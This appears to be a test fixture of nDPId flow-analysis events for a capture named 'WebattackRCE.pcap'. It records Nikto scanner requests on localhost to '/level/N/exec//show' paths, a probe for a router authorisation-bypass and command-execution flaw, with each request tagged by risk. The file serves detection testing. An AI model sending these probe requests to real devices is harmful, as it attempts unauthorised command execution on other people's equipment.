+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":1,"flow_last_seen":1576420277711,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277711,"pkt":"AAAAAAAAAAAAAAAACABFAADIwilAAEAGegR\/AAABfwAAAcaIH5AoWfs0DfPUMYAYAED+vAAAAQEICp1m\/vedZv73R0VUIC9sZXZlbC84My9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/83\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001330)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":1,"flow_last_seen":1576420277713,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277713,"pkt":"AAAAAAAAAAAAAAAACABFAADIsuZAAEAGiUd\/AAABfwAAAcaKH5B+eYvxDWxq9oAYAED+vAAAAQEICp1m\/vmdZv75R0VUIC9sZXZlbC84NC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/84\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001331)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277715,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":1,"flow_last_seen":1576420277715,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277715,"pkt":"AAAAAAAAAAAAAAAACABFAADIFWJAAEAGJsx\/AAABfwAAAcaMH5B2cix1DMITXYAYAED+vAAAAQEICp1m\/vudZv77R0VUIC9sZXZlbC84NS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277715,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/85\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001332)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277716,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":1,"flow_last_seen":1576420277716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277716,"pkt":"AAAAAAAAAAAAAAAACABFAADIj0FAAEAGrOx\/AAABfwAAAcaOH5BnL7Yrjj53uYAYAED+vAAAAQEICp1m\/vydZv78R0VUIC9sZXZlbC84Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277716,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/86\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001333)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":1,"flow_last_seen":1576420277718,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277718,"pkt":"AAAAAAAAAAAAAAAACABFAADI9rtAAEAGRXJ\/AAABfwAAAcaQH5Cd5s+tew18QIAYAED+vAAAAQEICp1m\/v6dZv7+R0VUIC9sZXZlbC84Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/87\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001334)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":1,"flow_last_seen":1576420277719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277719,"pkt":"AAAAAAAAAAAAAAAACABFAADIwR1AAEAGexB\/AAABfwAAAcaSH5DFAfgO5Rn4M4AYAED+vAAAAQEICp1m\/v+dZv7\/R0VUIC9sZXZlbC84OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzUpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/88\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001335)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":1,"flow_last_seen":1576420277721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277721,"pkt":"AAAAAAAAAAAAAAAACABFAADIEWBAAEAGKs5\/AAABfwAAAcaUH5BnvihJZne+zoAYAED+vAAAAQEICp1m\/wGdZv8BR0VUIC9sZXZlbC84OS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/89\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001336)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277723,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":1,"flow_last_seen":1576420277723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277723,"pkt":"AAAAAAAAAAAAAAAACABFAADIo9hAAEAGmFV\/AAABfwAAAcaWH5BWPprB7Bx1PYAYAED+vAAAAQEICp1m\/wKdZv8CR0VUIC9sZXZlbC85MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277723,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/90\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001337)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":1,"flow_last_seen":1576420277725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277725,"pkt":"AAAAAAAAAAAAAAAACABFAADI7YBAAEAGTq1\/AAABfwAAAcaYH5AUj9RqmT7XtIAYAED+vAAAAQEICp1m\/wWdZv8FR0VUIC9sZXZlbC85MS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/91\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001338)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":1,"flow_last_seen":1576420277727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277727,"pkt":"AAAAAAAAAAAAAAAACABFAADIYyZAAEAG2Qd\/AAABfwAAAcaaH5DSD1o0DsX43oAYAED+vAAAAQEICp1m\/wadZv8GR0VUIC9sZXZlbC85Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/92\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001339)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277729,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":1,"flow_last_seen":1576420277729,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277729,"pkt":"AAAAAAAAAAAAAAAACABFAADIxzpAAEAGdPN\/AAABfwAAAcacH5ALNv4hgWKnmoAYAED+vAAAAQEICp1m\/widZv8IR0VUIC9sZXZlbC85My9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277729,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/93\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001340)"}} 